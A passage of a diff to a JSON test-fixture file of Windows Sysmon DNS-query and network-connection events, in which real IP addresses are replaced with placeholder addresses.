Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -4288,7 +4288,7 @@ "winlog": { "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.101", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4336,7 +4336,7 @@ "ProcessId": "2736", "QueryName": "pre-usermatch.targeting.unrulymedia.com", "QueryStatus": "0", - "QueryResults": "type: 5 usermatch.targeting.unrulymedia.com;::ffff:35.167.55.0;::ffff:52.24.219.168;::ffff:52.43.21.209;::ffff:54.200.225.167;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;", + "QueryResults": "type: 5 usermatch.targeting.unrulymedia.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.137", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -4355,7 +4355,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:35.167.55.0;::ffff:52.24.219.168;::ffff:52.43.21.209;::ffff:54.200.225.167;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692750200Z'/\u003e\u003cEventRecordID\u003e137\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.137\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epre-usermatch.targeting.unrulymedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 usermatch.targeting.unrulymedia.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -4364,7 +4364,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:144.76.67.119;::ffff:148.251.77.207;::ffff:148.251.15.115;::ffff:176.9.103.51;::ffff:88.198.208.110;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692762900Z'/\u003e\u003cEventRecordID\u003e138\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.141\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003efarm.plista.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 farm-hetzner.plista.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4384,7 +4384,7 @@ "event_data": { "QueryName": "farm.plista.com", "QueryStatus": "0", - "QueryResults": "type: 5 farm-hetzner.plista.com;::ffff:144.76.67.119;::ffff:148.251.77.207;::ffff:148.251.15.115;::ffff:176.9.103.51;::ffff:88.198.208.110;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "type: 5 farm-hetzner.plista.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.141", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4406,7 +4406,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:50.17.180.35;::ffff:50.19.103.40;::ffff:50.19.210.19;::ffff:50.19.117.149;::ffff:50.19.222.244;::ffff:50.19.222.88;::ffff:50.19.81.100;::ffff:54.204.10.30;192.5.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692780500Z'/\u003e\u003cEventRecordID\u003e139\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.168\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ebeacon.krxd.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -4433,7 +4433,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:50.17.180.35;::ffff:50.19.103.40;::ffff:50.19.210.19;::ffff:50.19.117.149;::ffff:50.19.222.244;::ffff:50.19.222.88;::ffff:50.19.81.100;::ffff:54.204.10.30;192.5.6.30;", + "QueryResults": "type: 5 beacon-n-ash.lb.krxd.net;type: 5 beacon-17-537698933.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.168", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4459,7 +4459,7 @@ "ProcessId": "4", "Protocol": "udp", "SourceHostname": "vagrant-2012-r2.local.crowbird.com", - "DestinationIp": "169.254.180.25", + "DestinationIp": "89.160.20.156", "DestinationIsIpv6": "false", "Image": "System", "User": "NT AUTHORITY\\SYSTEM", @@ -4489,7 +4489,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3" } }, @@ -4830,7 +4830,7 @@ { "@timestamp": "2021-05-05T15:30:51.704Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4847,7 +4847,7 @@ "time_created": "2019-07-18T03:34:04.692Z", "level": "information", "event_data": { - "QueryResults": "type: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;", + "QueryResults": "type: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.169", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4885,7 +4885,7 @@ "ProcessId": "2736", "QueryName": "sync.mathtag.com", "QueryStatus": "0", - "QueryResults": "type: 5 pixel-origin.mathtag.com;::ffff:216.200.232.235;::ffff:216.200.232.201;::ffff:74.121.138.26;::ffff:216.200.232.185;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;" + "QueryResults": "type: 5 pixel-origin.mathtag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;" }, "record_id": 141, "event_id": "22", @@ -4905,7 +4905,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:216.200.232.235;::ffff:216.200.232.201;::ffff:74.121.138.26;::ffff:216.200.232.185;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent 